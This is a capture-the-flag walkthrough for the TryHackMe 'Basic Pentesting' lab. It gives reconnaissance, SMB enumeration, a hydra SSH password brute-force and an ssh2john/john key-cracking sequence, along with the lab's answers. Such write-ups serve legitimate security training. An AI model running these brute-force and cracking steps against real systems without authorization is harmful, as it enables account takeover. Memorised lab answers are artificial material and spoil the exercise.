TryHackMe: Basic Pentesting
In this set of tasks you’ll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
Now Let’s Begin 🚀
1. Deploy the machine and connect to our network
Simple as it sounds click on the “Start Machine” Button on the top right of the section.
2. Reconnaissance
First thing we need to do is nmap scanning.
sudo nmap -Pn -A -sSV 10.10.11.29
We can see that services are :
* SSH at port 22
* HTTP at port 80
* SAMBA at port 139 & 445
These are only three majors we need in our case.
3. What is the name of the hidden directory on the web server(enter name without /)?
Access this IP_Address from web browser, shown below
To find the hidden directories on our web app we can use dirb or gobuster or any other tool.
# for dirb use :
dirb http://[Your_Target_IP]# for gobuster use
gobuster dir -u http://[Your_Target_IP] -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Here I’m using dirb and I got the following results :
Here we can see that we have our directory: /development
Let’s check the contents of both txt files:
Both files contain messages for -K and -J.
From these text files we have the following things in our knowledge :
* There are minimum 2 users (J and K, not the real usernames)
* Website is using Apache 2.5.12
* Website is also using SMB (samba)
* User J is having a weak password (most important)
Answer: development
4. User brute-forcing to find the username & password
# Method 1
Let’s start enumerating SMB port with enum4linux tool:
enum4linux -a 10.10.11.29
# Method 2
SMB enumeration with Nmap Scripting Engine (NSE). Let’s take a look at the available scripts:
In order to get as much information we can run all of these scripts with the following command:
nmap --script=smb-enum* <ip-addr>
As we can clearly see, there are Anonymous and $IPC hidden shares. The $IPC share enables inter-process communication as well as anonymous user login which requires no username or password. We can leverage this to our advantage by using the smbclient command and getting access to the anonymous share.
staff.txt might contain some useful information, so let’s get it into our computer with get staff.txt command.
It seems we’ve found “k” and “j” users first showed up in the dev notes. As the SSH port is open and we know that Jan has a weak password from the Kay note (j.txt), let’s run hydra for cracking Jan’s password and getting inside the server.
From the texts in the development folder, we analyzed that J (or Jan) is having a weak password so it will be easier to brute-force that using our best friend Hydra.
hydra -l jan -P /usr/share/wordlitsts/rockyou.txt ssh://<ip-addr>
What is the username?
Answer: jan
What is the password?
Answer: armando
5. What service do you use to access the server(answer in abbreviation in all caps)?
Let’s try to login into the system with jan credentials using SSH.
Answer: SSH
6. Enumerate the machine to find any vectors for privilege escalation.
Here we have successfully login. Now let’s explore this machine especially Kay’s account to get something. We have found password backup file of the Kay’s account but unfortunately, we don't have privileges on jan account to see them neither jan can sudo command.
In order to read the password backup file, we have to escalate the privileges. After exploring a bit more Kay’s directories we found ssh keys as shown below.
Save the keys on your machine in a file either using nano or any other text editor you like. or else we can transfer using rsync or scp commands.
Now run ssh2john tool to get the hash of the keys.
python3 /usr/share/john/ssh2john.py id_rsa > decrypted.txt
This will convert our Private SSH key into john form so that it can be cracked further
john --wordlist=/usr/share/wordlists/rockyou.txt decrypted.txt
This will give us our phrase: beeswax
Accessing as kay
Go to jan’s shell and write this command (because if we try to do this outside the ssh of jan or on our system shell it will not allow that). The syntax is as follows :
ssh -i /home/kay/.ssh/id_rsa kay@[TARGET_MACHINE_IP]
7. What is the name of the other user you found(all lowercase)?
Answer: kay
8. What is the final password you obtain?
The very last thing left is to cat the pass.bak file.